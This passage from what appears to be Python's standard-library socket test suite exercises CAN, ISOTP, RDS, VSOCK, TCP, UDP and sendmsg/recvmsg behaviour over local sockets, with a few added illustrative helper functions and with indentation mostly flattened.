'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
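# Illustrative sketch (not part of the test suite): the CAN_RAW_FILTER option
# used in testFilter() above takes packed (can_id, can_mask) pairs. The "=II"
# struct format (two native-order unsigned 32-bit integers, no padding) is the
# same layout the test uses; unpacking the bytes recovers the original values.
def _example_pack_can_filter(can_id=0x200, can_mask=0x700):
    import struct
    packed = struct.pack("=II", can_id, can_mask)
    assert len(packed) == 8
    # Round trip: the packed filter decodes back to the id/mask pair.
    assert struct.unpack("=II", packed) == (can_id, can_mask)
    return packed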
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
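# Illustrative sketch (not part of the test suite): how a classic CAN frame is
# laid out for build_can_frame()/dissect_can_frame() above. The format string
# used here ("=IB3x8s": 32-bit CAN id, 8-bit DLC, 3 pad bytes, 8 data bytes,
# 16 bytes total) is an assumption consistent with the 16-byte frame asserted
# in testBCM(); the test classes take the real format from their base class.
def _example_can_frame_roundtrip(can_id=0x123, data=b"\xc0\xff\xee"):
    import struct
    can_frame_fmt = "=IB3x8s"  # assumed classic struct can_frame layout
    can_dlc = len(data)
    frame = struct.pack(can_frame_fmt, can_id, can_dlc, data.ljust(8, b"\x00"))
    assert len(frame) == 16
    unpacked_id, unpacked_dlc, payload = struct.unpack(can_frame_fmt, frame)
    # Only the first can_dlc bytes of the 8-byte payload are meaningful.
    assert (unpacked_id, payload[:unpacked_dlc]) == (can_id, data)
    return frame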
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testCongestion(self):
# wait until the sender is done
self.evt.wait()
def _testCongestion(self):
# test the behavior in case of congestion
self.data = b'fill'
self.cli.setblocking(False)
try:
# try to lower the receiver's socket buffer size
self.cli.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 16384)
except OSError:
pass
with self.assertRaises(OSError) as cm:
try:
# fill the receiver's socket buffer
while True:
self.cli.sendto(self.data, 0, (HOST, self.port))
finally:
# signal the receiver we're done
self.evt.set()
# sendto() should have failed with ENOBUFS
self.assertEqual(cm.exception.errno, errno.ENOBUFS)
        # and we should have received a congestion notification through select
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
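# Illustrative sketch (not part of the test suite): the receive-until-EOF loop
# that testSendAll() above uses to drain a TCP connection. The helper name is
# hypothetical; it simply accumulates recv() chunks until the peer closes.
def _example_recv_all(sock, bufsize=1024):
    chunks = []
    while True:
        chunk = sock.recv(bufsize)
        if not chunk:  # b'' means the peer has closed the connection
            break
        chunks.append(chunk)
    return b"".join(chunks)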
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
        # Testing sendto() and recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
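# Illustrative sketch (not part of the test suite): the plain sendmsg()/
# recvmsg() round trip that the SendrecvmsgBase helpers above wrap. It assumes
# a POSIX platform where socket.socketpair() and the sendmsg()/recvmsg()
# methods are available; elsewhere it simply returns None.
def _example_sendmsg_recvmsg_roundtrip(payload=b"hello"):
    import socket
    if not (hasattr(socket, "socketpair") and
            hasattr(socket.socket, "sendmsg") and
            hasattr(socket.socket, "recvmsg")):
        return None
    left, right = socket.socketpair()
    try:
        # sendmsg() takes a sequence of buffers (gather write) ...
        left.sendmsg([payload[:2], payload[2:]])
        # ... and recvmsg() returns (data, ancillary data, flags, address).
        # A single call is enough for this tiny local payload.
        data, ancdata, flags, _addr = right.recvmsg(len(payload))
        assert data == payload
        assert ancdata == []
        return data, ancdata, flags
    finally:
        left.close()
        right.close()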
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
with self.assertRaises(socket.timeout):
while True:
self.sendmsgToServer([b"a"*512])
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
